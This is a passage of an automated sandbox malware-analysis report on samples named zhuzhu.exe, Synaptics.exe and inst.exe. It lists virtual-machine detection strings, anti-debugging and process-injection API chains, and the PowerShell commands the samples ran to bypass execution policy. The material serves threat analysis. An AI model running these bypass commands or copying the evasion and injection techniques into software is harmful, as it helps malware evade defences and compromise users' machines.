                                      Source: inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: without Hyper-V for WESS
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Datacenter without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: !Enterprise without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware20,1hbin@
                                      Source: Amcache.hve.22.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                      Source: Amcache.hve.22.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                      Source: Amcache.hve.22.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Standard without Hyper-V
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4149076831.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1806696801.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000003.1807464472.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4149076831.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4151548891.0000000002DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Enterprise without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: HPC Edition without Hyper-V
                                      Source: Amcache.hve.22.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                      Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                      Source: ._cache_zhuzhu.exe, 00000004.00000002.4148926208.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Hyper-V Server
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.sys
                                      Source: Amcache.hve.22.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin`
                                      Source: Amcache.hve.22.drBinary or memory string: \driver\vmci,\driver\pci
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Datacenter without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                      Source: Amcache.hve.22.drBinary or memory string: VMware20,1
                                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                      Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                      Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                      Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                      Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                      Source: Amcache.hve.22.drBinary or memory string: VMware PCI VMCI Bus Device
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Enterprise without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware VMCI Bus Device
                                      Source: Amcache.hve.22.drBinary or memory string: VMware Virtual RAM
                                      Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: Standard without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeAPI call chain: ExitProcess graph end nodegraph_4-43509
                                      Source: C:\Users\user\Downloads\inst.exeAPI call chain: ExitProcess graph end nodegraph_7-78452
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess information queried: ProcessInformationJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_25ABFF09 LdrInitializeThunk,2_2_25ABFF09
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1001124D
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00169CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,7_2_00169CD0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0378054D VirtualProtect ?,-00000001,00000104,?4_2_0378054D
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,1_2_10001170
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02860AE4 mov eax, dword ptr fs:[00000030h]1_2_02860AE4
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD0AE4 mov eax, dword ptr fs:[00000030h]4_2_02BD0AE4
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_035F00CD mov eax, dword ptr fs:[00000030h]4_2_035F00CD
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03776790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,4_2_03776790
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_1001154A
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1001124D
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02871521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02871521
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_02871520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02871520
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_0377DF10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0377F00A
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03781F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03781F67
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C66815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_02C66815
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C68587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02C68587
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001EA44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_001EA44A
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_001E4647
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_001E116F
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E18F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_001E18F6
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F537A51 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_5F537A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_001E4647
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_001E116F
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E18F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_001E18F6

                                      HIPS / PFW / Operating System Protection Evasion

                                      barindex
                                      Bypasses PowerShell execution policy
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Contains functionality to inject code into remote processes
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_037777E0
                                      Contains functionality to inject threads in other processes
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_037777E0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_037777E0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_037777E0
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\Users\user\Desktop\._cache_zhuzhu.exe "C:\Users\user\Desktop\._cache_zhuzhu.exe" Jump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe" Jump to behavior
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: ._cache_zhuzhu.exe, 00000004.00000002.4160565471.0000000003A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                                      Source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.drBinary or memory string: gShell_traywnd*.*
                                      Source: inst.exeBinary or memory string: Shell_traywnd
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001665C0 cpuid 7_2_001665C0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03775430
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_001F7AB2
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,7_2_0020C813
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,7_2_001F7569
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_001F7A4B
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,7_2_001F7AEE
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{D5BF8E62-3285-45ad-A7CB-467DE934221E}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{B7A42130-77F9-4b13-8C0B-EB34FF385D20}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{2E43FD7B-E729-4283-947B-1D49591810C4}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
